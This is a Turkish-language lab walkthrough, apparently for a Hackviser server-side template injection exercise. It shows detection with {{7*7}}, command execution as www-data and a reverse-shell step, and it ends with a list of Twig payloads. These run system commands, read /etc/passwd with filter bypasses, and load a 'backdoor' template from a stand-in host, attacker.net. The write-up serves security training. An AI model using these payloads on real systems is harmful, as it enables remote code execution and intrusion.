- 15 Ocak 2019
- 303
- 71
Selamlar bu konumuzda Hackviser üzerinden SSTİ labaratuarını çözeceğiz. Önceki konunun devamı niteliğinde olmasını istedim, öncelikle openvpn üzerinden bağlantımı açıyorum ve sistemin bana verdiği ip adresi ile bağlantıyı gerçekleştiriyorum.
Güzel bir şekilde web sayfası yükleniyorken bende burp üzerinden HTTP history kısmına bakıyor ve dirb adlı araç ile dizinleri taramaya koyuldum. Ufak tefek bulgular haricinde herhangi birşey gözüme çarpmayınca comment alanına indim. Ve testleri bu alanda yoğunlaştırırken ; {{7*7}}
Ufak bir payload setim var kimi ERB kimi Tornado v.s deniyor lakin en sonunda {{7*7}} payladım çalıştığı için kolayca anlıyorum ki bu Twig benzeri bir template kullanıyor daha fazla detaya inmek için testler yapmaya başladım.
Ve bu verdiğim payloadın karşılığında bizlere dönen sonuç , uid=33(www-data) gid=33(www-data) groups=33(www-data)Array
Bundan sonra sistemde reverse shell çekmemiz gerekiyor.
Görmüş olduğunuz gibi anlık şekilde bağlantı alabiliyorum, bundan ziyade reverse shell kurmak için revshells adlı web site aracılığı ile testler gerçekleştirebilirsiniz, lakin unutmayın ki lab ortamında sadece tun0 adreslerinden kullanabilirsiniz.
Bunlarla beraber daha falza test yapmak isterseniz ;
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
Sistem üzerinde hem komut çalıştırabilir, hem okuyabilir hemde aktif bağlantılar alabilirsiniz.